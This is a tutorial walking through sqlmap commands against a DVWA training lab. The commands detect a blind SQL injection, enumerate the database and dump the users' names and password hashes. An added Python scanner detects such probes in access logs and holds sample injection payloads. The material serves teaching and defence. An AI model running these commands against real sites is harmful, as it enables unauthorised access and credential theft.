
SQL MAP

What is SQLMAP?

sqlmap is an SQL injection tool developed in Python. Its goal is to detect and exploit SQL injection vulnerabilities in web applications or sites. Once it detects one or more SQL injections on a target, the user can choose from a variety of options that sqlmap provides to explore the data stored in the database of that system or site, such as extracting the list of users, passwords, privileges, tables, and more.
Let’s pass the GET request to sqlmap and analyze the process. The variable to check is id. If an SQL injection vulnerability is found in this variable, sqlmap will be able to view the parameter the database uses to select data and also view the databases.


sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.189.246/DVWA/vulnerabilities/sqli_blind/?id=5&Submit=Submit" -p id

Let’s add the --dbs parameter so we can see the name of the database.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id --dbs

Let’s add the -D parameter to select the database that was found, and then --tables, so we can see the tables.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id -D dvwa --tables

Let’s add the -T users --columns parameters to see each field in the users table.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id -D dvwa -T users --columns

Let’s add the parameters -C user,password --dump so we can get a full dump of the database. sqlmap also gives you the option to create a file with the dumped hashes and to use a dictionary-based attack to crack the passwords.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id -D dvwa -T users -C user,password --dump
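
Seen from the server side, the runs above leave traces in the web access log. The following is an added example, not part of the original post: a small scanner that flags requests where the id parameter is not a plain number or carries SQL syntax, and requests sent with sqlmap's default User-Agent (which begins with "sqlmap/"). The combined log format, the addresses, the version string and the log lines themselves are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses and agents are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=5&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=5%27%20AND%204821%3D4821%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=5%20AND%20SLEEP(5)&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
"""

# Captures client IP, request target and User-Agent from one combined-format line.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"'
)
# Quotes, comment markers and keywords that have no place in a numeric id.
SQL_TOKENS = re.compile(
    r"'|\"|--|#|/\*|\b(?:and|or|union|select|sleep|benchmark)\b", re.I
)


def scan(log_text, param="id"):
    """Return {client_ip: sorted reasons} for requests that look like injection probing."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, agent = m.groups()
        # Default sqlmap User-Agent; it is client-controlled, so it is only one signal.
        if agent.lower().startswith("sqlmap/"):
            findings[ip].add("sqlmap-user-agent")
        # parse_qs URL-decodes the values, so %27 and %20 are inspected as ' and space.
        for value in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
            if not re.fullmatch(r"[0-9]+", value):
                findings[ip].add(f"non-numeric-{param}")
            if SQL_TOKENS.search(value):
                findings[ip].add(f"sql-syntax-in-{param}")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The parameter checks do not depend on the User-Agent, so they still fire when the client presents a browser-like agent string.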
